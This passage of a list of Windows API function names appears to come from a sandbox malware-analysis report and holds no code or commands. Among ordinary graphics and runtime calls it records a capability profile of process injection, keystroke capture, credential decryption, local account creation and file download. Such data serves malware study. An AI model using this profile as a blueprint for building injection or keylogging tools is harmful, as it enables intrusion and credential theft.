- "shell32.dll.SHGetFolderPathW",
- "kernel32.dll.GetModuleHandleW",
- "advapi32.dll.AddMandatoryAce",
- "ntmarta.dll.GetMartaExtensionInterface",
- "ws2_32.dll.accept",
- "ws2_32.dll.bind",
- "ws2_32.dll.closesocket",
- "ws2_32.dll.connect",
- "ws2_32.dll.getpeername",
- "ws2_32.dll.getsockname",
- "ws2_32.dll.getsockopt",
- "ws2_32.dll.ntohl",
- "ws2_32.dll.htonl",
- "ws2_32.dll.htons",
- "ws2_32.dll.inet_addr",
- "ws2_32.dll.inet_ntoa",
- "ws2_32.dll.ioctlsocket",
- "ws2_32.dll.listen",
- "ws2_32.dll.ntohs",
- "ws2_32.dll.recv",
- "ws2_32.dll.recvfrom",
- "ws2_32.dll.select",
- "ws2_32.dll.send",
- "ws2_32.dll.sendto",
- "ws2_32.dll.setsockopt",
- "ws2_32.dll.shutdown",
- "ws2_32.dll.socket",
- "ws2_32.dll.gethostbyname",
- "ws2_32.dll.gethostname",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.WSAGetLastError",
- "ws2_32.dll.WSASetLastError",
- "ws2_32.dll.WSAStartup",
- "ws2_32.dll.WSACleanup",
- "ws2_32.dll.__WSAFDIsSet",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.getnameinfo",
- "ws2_32.dll.WSALookupServiceBeginW",
- "ws2_32.dll.WSALookupServiceNextW",
- "ws2_32.dll.WSALookupServiceEnd",
- "ws2_32.dll.WSANSPIoctl",
- "ws2_32.dll.WSAStringToAddressA",
- "ws2_32.dll.WSAStringToAddressW",
- "ws2_32.dll.WSAAddressToStringA",
- "dnsapi.dll.DnsGetProxyInformation",
- "dnsapi.dll.DnsFreeProxyName",
- "iphlpapi.dll.GetIpForwardTable2",
- "iphlpapi.dll.FreeMibTable",
- "iphlpapi.dll.GetIfEntry2",
- "iphlpapi.dll.ConvertInterfaceGuidToLuid",
- "iphlpapi.dll.ResolveIpNetEntry2",
- "iphlpapi.dll.GetIpNetEntry2",
- "shlwapi.dll.#260",
- "rasapi32.dll.RasConnectionNotificationW",
- "rasapi32.dll.RasEnumEntriesW",
- "rtutils.dll.TracePrintfExA",
- "sechost.dll.ConvertSidToStringSidW",
- "profapi.dll.#104",
- "shlwapi.dll.PathCanonicalizeW",
- "shlwapi.dll.PathRemoveFileSpecW",
- "shlwapi.dll.PathFindFileNameW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036",
- "sensapi.dll.IsNetworkAlive",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.NdrClientCall2",
- "kernel32.dll.TerminateThread",
- "kernel32.dll.CreateThread",
- "kernel32.dll.WriteFile",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.ReadFile",
- "kernel32.dll.FindFirstFileA",
- "kernel32.dll.GetBinaryTypeW",
- "kernel32.dll.FindNextFileA",
- "kernel32.dll.GetFullPathNameA",
- "kernel32.dll.GetTempPathW",
- "kernel32.dll.GetPrivateProfileStringW",
- "kernel32.dll.CreateFileA",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.SetCurrentDirectoryW",
- "kernel32.dll.LocalFree",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.FreeLibrary",
- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.WaitForMultipleObjects",
- "kernel32.dll.CreatePipe",
- "kernel32.dll.PeekNamedPipe",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.SetEvent",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.CreateEventA",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.LoadResource",
- "kernel32.dll.FindResourceW",
- "kernel32.dll.HeapFree",
- "kernel32.dll.LoadLibraryExW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFilePointer",
- "kernel32.dll.GetLogicalDriveStringsW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.InitializeCriticalSection",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.ReleaseMutex",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.OpenProcess",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.CreateProcessA",
- "kernel32.dll.SizeofResource",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.GetSystemDirectoryW",
- "kernel32.dll.LockResource",
- "kernel32.dll.GetWindowsDirectoryW",
- "kernel32.dll.IsWow64Process",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.Process32First",
- "kernel32.dll.WriteProcessMemory",
- "kernel32.dll.Process32Next",
- "kernel32.dll.GetWindowsDirectoryA",
- "kernel32.dll.VirtualProtectEx",
- "kernel32.dll.VirtualAllocEx",
- "kernel32.dll.CreateRemoteThread",
- "kernel32.dll.WinExec",
- "kernel32.dll.GetTempPathA",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.GetProcAddress",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.lstrcmpW",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.lstrcpyW",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.lstrcpyA",
- "kernel32.dll.Sleep",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.lstrcatA",
- "kernel32.dll.lstrcmpA",
- "kernel32.dll.lstrlenA",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.lstrlenW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.lstrcatW",
- "kernel32.dll.GetLastError",
- "kernel32.dll.SetLastError",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.GetComputerNameW",
- "user32.dll.MessageBoxA",
- "user32.dll.GetKeyState",
- "user32.dll.GetMessageA",
- "user32.dll.DispatchMessageA",
- "user32.dll.CreateWindowExW",
- "user32.dll.CallNextHookEx",
- "user32.dll.GetAsyncKeyState",
- "user32.dll.wsprintfW",
- "user32.dll.wsprintfA",
- "user32.dll.GetLastInputInfo",
- "user32.dll.GetWindowTextW",
- "user32.dll.RegisterClassW",
- "user32.dll.GetRawInputData",
- "user32.dll.TranslateMessage",
- "user32.dll.GetForegroundWindow",
- "user32.dll.DefWindowProcA",
- "user32.dll.RegisterRawInputDevices",
- "user32.dll.MapVirtualKeyA",
- "user32.dll.ToUnicode",
- "user32.dll.GetKeyNameTextW",
- "user32.dll.PostQuitMessage",
- "advapi32.dll.RegDeleteKeyA",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.RegDeleteKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegQueryValueExW",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.ChangeServiceConfigW",
- "advapi32.dll.QueryServiceConfigW",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.CloseServiceHandle",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.LookupAccountSidW",
- "advapi32.dll.FreeSid",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.AdjustTokenPrivileges",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.RegDeleteValueW",
- "advapi32.dll.RegSetValueExA",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegQueryValueExA",
- "shell32.dll.ShellExecuteExA",
- "shell32.dll.ShellExecuteExW",
- "shell32.dll.SHGetSpecialFolderPathW",
- "shell32.dll.SHCreateDirectoryExW",
- "shell32.dll.ShellExecuteW",
- "urlmon.dll.URLDownloadToFileW",
- "ole32.dll.CoInitialize",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.CoTaskMemFree",
- "ole32.dll.CoUninitialize",
- "shlwapi.dll.StrStrA",
- "shlwapi.dll.StrStrW",
- "shlwapi.dll.PathFindExtensionW",
- "shlwapi.dll.PathCombineA",
- "shlwapi.dll.PathFileExistsW",
- "shlwapi.dll.PathRemoveFileSpecA",
- "netapi32.dll.NetUserAdd",
- "netapi32.dll.NetLocalGroupAddMembers",
- "crypt32.dll.CryptStringToBinaryA",
- "crypt32.dll.CryptUnprotectData",
- "psapi.dll.GetModuleFileNameExW",
- "wininet.dll.InternetQueryDataAvailable",
- "wininet.dll.InternetOpenUrlW",
- "wininet.dll.InternetOpenW",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetCheckConnectionW",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "wintrust.dll.WinVerifyTrust",
- "msdmo.dll.DMOEnum",
- "msdmo.dll.DMOGetTypes",
- "msdmo.dll.DMOGetName",
- "avicap32.dll.capGetDriverDescriptionW",
- "ole32.dll.CoTaskMemAlloc",
- "ole32.dll.CoInitializeEx",
- "ole32.dll.CreateBindCtx",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "comctl32.dll.#236",
- "oleaut32.dll.#6",
- "ole32.dll.CoGetMalloc",
- "comctl32.dll.#320",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "oleaut32.dll.#2",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "oleaut32.dll.#500",
- "rpcrt4.dll.RpcBindingFree",
- "advapi32.dll.UnregisterTraceGuids",
- "oleaut32.dll.#9",
- "comctl32.dll.#321",
- "shell32.dll.#66",
- "advapi32.dll.SetEntriesInAclW",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#332",
- "comctl32.dll.#338",
- "comctl32.dll.#339",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "shell32.dll.#102",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "comctl32.dll.#386",
- "apphelp.dll.ApphelpCheckShellObject",
- "comctl32.dll.#385",
- "comctl32.dll.#336",
- "comctl32.dll.#329",
- "comctl32.dll.#333",
- "ntdll.dll.RtlDllShutdownInProgress",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "linkinfo.dll.CreateLinkInfoW",
- "user32.dll.IsCharAlphaW",
- "user32.dll.CharPrevW",
- "ntshrui.dll.GetNetResourceFromLocalPathW",
- "srvcli.dll.NetShareEnum",
- "cscapi.dll.CscNetApiGetInterface",
- "slc.dll.SLGetWindowsInformationDWORD",
- "linkinfo.dll.DestroyLinkInfo",
- "propsys.dll.PropVariantToBoolean",
- "ole32.dll.PropVariantClear",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "cryptsp.dll.CryptReleaseContext",
- "advapi32.dll.RegEnumValueW",
- "kernel32.dll.QueryActCtxW",
- "shlwapi.dll.UrlIsW",
- "kernel32.dll.FlsFree",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "kernel32.dll.IsProcessorFeaturePresent",
- "msvcrt.dll._set_error_mode",
- "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
- "kernel32.dll.FindActCtxSectionStringW",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "mscoree.dll.GetProcessExecutableHeap",
- "mscorwks.dll.DllGetClassObjectInternal",
- "mscorwks.dll.GetCLRFunction",
- "advapi32.dll.RegisterTraceGuidsW",
- "advapi32.dll.GetTraceLoggerHandle",
- "advapi32.dll.GetTraceEnableLevel",
- "advapi32.dll.GetTraceEnableFlags",
- "advapi32.dll.TraceEvent",
- "mscoree.dll.IEE",
- "mscorwks.dll.IEE",
- "mscoree.dll.GetStartupFlags",
- "mscoree.dll.GetHostConfigurationFile",
- "mscoree.dll.GetCORSystemDirectory",
- "ntdll.dll.RtlUnwind",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAce",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.AddVectoredContinueHandler",
- "kernel32.dll.RemoveVectoredContinueHandler",
- "advapi32.dll.ConvertSidToStringSidW",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.GetWriteWatch",
- "kernel32.dll.ResetWriteWatch",
- "kernel32.dll.CreateMemoryResourceNotification",
- "kernel32.dll.QueryMemoryResourceNotification",
- "mscoree.dll._CorExeMain",
- "mscoree.dll._CorImageUnloading",
- "mscoree.dll._CorValidateImage",
- "oleaut32.dll.#149",
- "kernel32.dll.GetUserDefaultUILanguage",
- "ole32.dll.CoGetContextToken",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GetFileAttributesExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "kernel32.dll.lstrlen",
- "mscoree.dll.ND_RI2",
- "kernel32.dll.lstrcpy",
- "version.dll.VerLanguageNameW",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetModuleInformation",
- "psapi.dll.GetModuleBaseNameW",
- "kernel32.dll.GetExitCodeProcess",
- "ntdll.dll.NtQuerySystemInformation",
- "user32.dll.EnumWindows",
- "user32.dll.GetWindowThreadProcessId",
- "user32.dll.GetWindow",
- "user32.dll.IsWindowVisible",
- "kernel32.dll.WerSetFlags",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.GetEnvironmentVariableW",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptVerifySignatureA",
- "advapi32.dll.CryptSignHashA",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.CryptEnumProvidersA",
- "cryptsp.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptImportKey",
- "cryptsp.dll.CryptExportKey",
- "cryptsp.dll.CryptCreateHash",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyKey",
- "mscoree.dll.GetTokenForVTableEntry",
- "mscoree.dll.SetTargetForVTableEntry",
- "mscoree.dll.GetTargetForVTableEntry",
- "culture.dll.ConvertLangIdToCultureName",
- "ole32.dll.CoCreateGuid",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "kernel32.dll.LocalAlloc",
- "mscoree.dll.ND_RI4",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetConsoleTitleW",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.CreateEventW",
- "ntdll.dll.WinSqmIsOptedIn",
- "shfolder.dll.SHGetFolderPathW",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.GetACP",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.GetFileType",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.SwitchToThread",
- "kernel32.dll.GlobalMemoryStatusEx",
- "secur32.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.ReportEventW",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.GetVolumeInformationW",
- "mscorjit.dll.getJit",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.FindClose",
- "mscoree.dll.DllGetClassObject",
- "diasymreader.dll.DllGetClassObjectInternal",
- "kernel32.dll.GetConsoleOutputCP",
- "gdi32.dll.TranslateCharsetInfo",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.WriteConsoleW",
- "mscoree.dll.CorExitProcess",
- "mscorwks.dll.CorExitProcess",
- "mscorwks.dll._CorDllMain",
- "kernel32.dll.CreateActCtxW",
- "kernel32.dll.AddRefActCtx",
- "kernel32.dll.ReleaseActCtx",
- "kernel32.dll.ActivateActCtx",
- "kernel32.dll.DeactivateActCtx",
- "kernel32.dll.GetCurrentActCtx",
- "netutils.dll.NetApiBufferFree",
- "rtutils.dll.TraceRegisterExA",
- "ntdll.dll.RtlGetVersion",
- "ntdll.dll.NtOpenKey",
- "ntdll.dll.wcscat_s",
- "ntdll.dll.wcscpy_s",
- "ntdll.dll.NtEnumerateKey",
- "ntdll.dll.RtlOpenCurrentUser",
- "ntdll.dll.RtlFreeHeap",
- "ntdll.dll.RtlAllocateHeap",
- "ntdll.dll.memcpy",
- "ntdll.dll.memset",
- "ntdll.dll.RtlEnterCriticalSection",
- "ntdll.dll.RtlLeaveCriticalSection",
- "ntdll.dll.RtlUnicodeToMultiByteN",
- "ntdll.dll.RtlMultiByteToUnicodeN",
- "ntdll.dll.RtlReleaseActivationContext",
- "ntdll.dll.RtlFindActivationContextSectionString",
- "ntdll.dll.RtlDeactivateActivationContextUnsafeFast",
- "ntdll.dll.RtlActivateActivationContextUnsafeFast",
- "ntdll.dll.wcstol",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.NtQuerySecurityObject",
- "ntdll.dll.NtSetSecurityObject",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.RtlAnsiStringToUnicodeString",
- "ntdll.dll.RtlInitAnsiString",
- "ntdll.dll.RtlCreateUnicodeStringFromAsciiz",
- "ntdll.dll.RtlQueryInformationActiveActivationContext",
- "ntdll.dll._vsnwprintf",
- "ntdll.dll.NtVdmControl",
- "ntdll.dll.wcstoul",
- "ntdll.dll.NtOpenDirectoryObject",
- "ntdll.dll.NtDeleteValueKey",
- "ntdll.dll.NtSetValueKey",
- "ntdll.dll.NtCreateKey",
- "ntdll.dll.NtYieldExecution",
- "ntdll.dll.RtlIsThreadWithinLoaderCallout",
- "ntdll.dll._wcsicmp",
- "ntdll.dll._stricmp",
- "ntdll.dll.RtlGetIntegerAtom",
- "ntdll.dll.NtProtectVirtualMemory",
- "ntdll.dll.RtlRetrieveNtUserPfn",
- "ntdll.dll.RtlInitializeNtUserPfn",
- "ntdll.dll.RtlDeleteCriticalSection",
- "ntdll.dll.RtlInitializeCriticalSection",
- "ntdll.dll._allshr",
- "ntdll.dll.RtlUnicodeToMultiByteSize",
- "ntdll.dll._allmul",
- "ntdll.dll.NtCallbackReturn",
- "ntdll.dll._chkstk",
- "ntdll.dll.memmove",
- "ntdll.dll.NtQueryInformationToken",
- "ntdll.dll.NtOpenProcessToken",
- "ntdll.dll.NtOpenThreadToken",
- "ntdll.dll.RtlNtStatusToDosError",
- "ntdll.dll.CsrClientCallServer",
- "ntdll.dll.CsrFreeCaptureBuffer",
- "ntdll.dll.CsrCaptureMessageBuffer",
- "ntdll.dll.CsrAllocateCaptureBuffer",
- "ntdll.dll.RtlFreeSid",
- "ntdll.dll.RtlAllocateAndInitializeSid",
- "ntdll.dll.CsrAllocateMessagePointer",
- "ntdll.dll.RtlReAllocateHeap",
- "ntdll.dll.RtlRunDecodeUnicodeString",
- "ntdll.dll.RtlRunEncodeUnicodeString",
- "ntdll.dll.RtlGetThreadLangIdByIndex",
- "ntdll.dll.RtlSizeHeap",
- "ntdll.dll.strcpy_s",
- "ntdll.dll.sscanf_s",
- "ntdll.dll.strrchr",
- "ntdll.dll.RtlIsNameLegalDOS8Dot3",
- "ntdll.dll.wcsncat_s",
- "ntdll.dll.NtRaiseHardError",
- "ntdll.dll.RtlMultiByteToUnicodeSize",
- "ntdll.dll.RtlCheckRegistryKey",
- "ntdll.dll.LdrFlushAlternateResourceModules",
- "ntdll.dll.qsort",
- "ntdll.dll.iswspace",
- "ntdll.dll.wcsncpy_s",
- "ntdll.dll.wcsrchr",
- "ntdll.dll._alldiv",
- "ntdll.dll._wtoi",
- "ntdll.dll._aulldvrm",
- "ntdll.dll.NlsAnsiCodePage",
- "ntdll.dll.RtlImageNtHeader",
- "ntdll.dll.RtlSetLastWin32Error",
- "ntdll.dll.NtClose",
- "ntdll.dll.NtQueryValueKey",
- "ntdll.dll.swprintf_s",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlUnicodeStringToInteger",
- "gdi32.dll.GetClipRgn",
- "gdi32.dll.ExtSelectClipRgn",
- "gdi32.dll.GetHFONT",
- "gdi32.dll.GetMapMode",
- "gdi32.dll.SetGraphicsMode",
- "gdi32.dll.GetClipBox",
- "gdi32.dll.CreateRectRgn",
- "gdi32.dll.CreateRectRgnIndirect",
- "gdi32.dll.SetLayout",
- "gdi32.dll.GetBoundsRect",
- "gdi32.dll.ExcludeClipRect",
- "gdi32.dll.PlayEnhMetaFile",
- "gdi32.dll.Ellipse",
- "gdi32.dll.CreateEllipticRgn",
- "gdi32.dll.GdiFixUpHandle",
- "gdi32.dll.CreatePen",
- "gdi32.dll.Rectangle",
- "gdi32.dll.GetTextCharacterExtra",
- "gdi32.dll.SetTextCharacterExtra",
- "gdi32.dll.GetCurrentObject",
- "gdi32.dll.GetViewportOrgEx",
- "gdi32.dll.SetViewportOrgEx",
- "gdi32.dll.PolyPatBlt",
- "gdi32.dll.CreateBrushIndirect",
- "gdi32.dll.SetBoundsRect",
- "gdi32.dll.CopyEnhMetaFileW",
- "gdi32.dll.CopyMetaFileW",
- "gdi32.dll.GetPaletteEntries",
- "gdi32.dll.CreatePalette",
- "gdi32.dll.SetPaletteEntries",
- "gdi32.dll.GetPixel",
- "gdi32.dll.ExtTextOutA",
- "gdi32.dll.GetTextCharsetInfo",
- "gdi32.dll.QueryFontAssocStatus",
- "gdi32.dll.GetCharWidthInfo",
- "gdi32.dll.GetCharWidthA",
- "gdi32.dll.GetTextFaceW",
- "gdi32.dll.GetCharABCWidthsA",
- "gdi32.dll.GetCharABCWidthsW",
- "gdi32.dll.SetBrushOrgEx",
- "gdi32.dll.CreateFontIndirectW",
- "gdi32.dll.EnumFontsW",
- "gdi32.dll.GetTextFaceAliasW",
- "gdi32.dll.GetTextMetricsW",
- "gdi32.dll.GetTextColor",
- "gdi32.dll.GdiGetCodePage",
- "gdi32.dll.GetTextCharset",
- "gdi32.dll.GetBkMode",
- "gdi32.dll.GetViewportExtEx",
- "gdi32.dll.GetWindowExtEx",
- "gdi32.dll.GdiGetCharDimensions",
- "gdi32.dll.GdiPrinterThunk",
- "gdi32.dll.GdiLoadType1Fonts",
- "gdi32.dll.GdiAddFontResourceW",
- "gdi32.dll.SaveDC",
- "gdi32.dll.OffsetWindowOrgEx",
- "gdi32.dll.RestoreDC",
- "gdi32.dll.ExtTextOutW",
- "gdi32.dll.GetDIBits",
- "gdi32.dll.CreateDIBSection",
- "gdi32.dll.SetStretchBltMode",
- "gdi32.dll.SelectPalette",
- "gdi32.dll.RealizePalette",
- "gdi32.dll.SetDIBits",
- "gdi32.dll.CreateDCW",
- "gdi32.dll.CreateDIBitmap",
- "gdi32.dll.CreateCompatibleBitmap",
- "gdi32.dll.SetBitmapBits",
- "gdi32.dll.DeleteDC",
- "gdi32.dll.GdiValidateHandle",
- "gdi32.dll.GdiDllInitialize",
- "gdi32.dll.GdiProcessSetup",
- "gdi32.dll.GetStockObject",
- "gdi32.dll.CreateSolidBrush",
- "gdi32.dll.CreateCompatibleDC",
- "gdi32.dll.GdiConvertBitmapV5",
- "gdi32.dll.GdiCreateLocalEnhMetaFile",
- "gdi32.dll.GdiCreateLocalMetaFilePict",
- "gdi32.dll.GetRgnBox",
- "gdi32.dll.CombineRgn",
- "gdi32.dll.OffsetRgn",
- "gdi32.dll.MirrorRgn",
- "gdi32.dll.EnableEUDC",
- "gdi32.dll.GdiConvertToDevmodeW",
- "gdi32.dll.GetTextExtentPointA",
- "gdi32.dll.GetTextExtentPointW",
- "gdi32.dll.CreateBitmap",
- "gdi32.dll.SetTextAlign",
- "gdi32.dll.GetTextAlign",
- "gdi32.dll.IntersectClipRect",
- "gdi32.dll.SelectObject",
- "gdi32.dll.SetBkMode",
- "gdi32.dll.GetBkColor",
- "gdi32.dll.GetObjectW",
- "gdi32.dll.SetTextColor",
- "gdi32.dll.SetBkColor",
- "gdi32.dll.GetLayout",
- "gdi32.dll.StretchDIBits",
- "gdi32.dll.GetDeviceCaps",
- "gdi32.dll.GetDIBColorTable",
- "gdi32.dll.GdiGetBitmapBitsSize",
- "gdi32.dll.DeleteObject",
- "gdi32.dll.DeleteMetaFile",
- "gdi32.dll.DeleteEnhMetaFile",
- "gdi32.dll.GdiConvertMetaFilePict",
- "gdi32.dll.GdiConvertEnhMetaFile",
- "gdi32.dll.GdiReleaseDC",
- "gdi32.dll.StretchBlt",
- "gdi32.dll.GetObjectType",
- "gdi32.dll.GdiConvertAndCheckDC",
- "gdi32.dll.SetRectRgn",
- "gdi32.dll.BitBlt",
- "gdi32.dll.TextOutW",
- "gdi32.dll.TextOutA",
- "gdi32.dll.PatBlt",
- "gdi32.dll.SetLayoutWidth",
- "kernel32.dll.GetLocaleInfoW",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.LoadLibraryExA",
- "kernel32.dll.InterlockedCompareExchange",
- "kernel32.dll.DelayLoadFailureHook",
- "kernel32.dll.GlobalAddAtomA",
- "kernel32.dll.GlobalFindAtomA",
- "kernel32.dll.QueryPerformanceFrequency",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.CreateFileMappingW",
- "kernel32.dll.MapViewOfFile",
- "kernel32.dll.WerpNotifyLoadStringResource",
- "kernel32.dll.GetSystemDefaultLangID",
- "kernel32.dll.RegQueryInfoKeyW",
- "kernel32.dll.RegEnumValueW",
- "kernel32.dll.RegOpenKeyExW",
- "kernel32.dll.RegQueryValueExW",
- "kernel32.dll.IsDBCSLeadByte",
- "kernel32.dll.WerpNotifyUseStringResource",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.MulDiv",
- "kernel32.dll.GetThreadLocale",
- "kernel32.dll.ConvertDefaultLocale",
- "kernel32.dll.IsValidLocale",
- "kernel32.dll.GetAtomNameW",
- "kernel32.dll.GetAtomNameA",
- "kernel32.dll.AddAtomW",
- "kernel32.dll.AddAtomA",
- "kernel32.dll.EnumResourceNamesExW",
- "kernel32.dll.SetFileTime",
- "kernel32.dll.CompareStringW",
- "kernel32.dll.GetCPInfo",
- "kernel32.dll.GetStringTypeA",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.FoldStringW",
- "kernel32.dll.GlobalHandle",
- "kernel32.dll.GetExitCodeThread",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetCurrentThread",
- "kernel32.dll.GlobalAddAtomW",
- "kernel32.dll.SearchPathW",
- "kernel32.dll.IsDBCSLeadByteEx",
- "kernel32.dll.DisableThreadLibraryCalls",
- "kernel32.dll.FindResourceExA",
- "kernel32.dll.FindResourceExW",
- "kernel32.dll.LoadStringBaseExW",
- "kernel32.dll.RegisterWaitForInputIdle",
- "kernel32.dll.QueryActCtxSettingsW",
- "kernel32.dll.LoadAppInitDlls",
- "kernel32.dll.LocalSize",
- "kernel32.dll.LocalUnlock",
- "kernel32.dll.LocalLock",
- "kernel32.dll.LocalReAlloc",
- "kernel32.dll.InterlockedIncrement",
- "kernel32.dll.RegSetValueExW",
- "kernel32.dll.RegCloseKey",
- "kernel32.dll.RegCreateKeyExW",
- "kernel32.dll.RegDeleteKeyExW",
- "kernel32.dll.GetUserDefaultLCID",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.GlobalSize",
- "kernel32.dll.GlobalDeleteAtom",
- "kernel32.dll.DeleteAtom",
- "kernel32.dll.InterlockedExchange",
- "kernel32.dll.GlobalGetAtomNameA",
- "kernel32.dll.GlobalGetAtomNameW",
- "kernel32.dll.GlobalFree",
- "kernel32.dll.InterlockedDecrement",
- "kernel32.dll.GlobalFlags",
- "kernel32.dll.GetOEMCP",
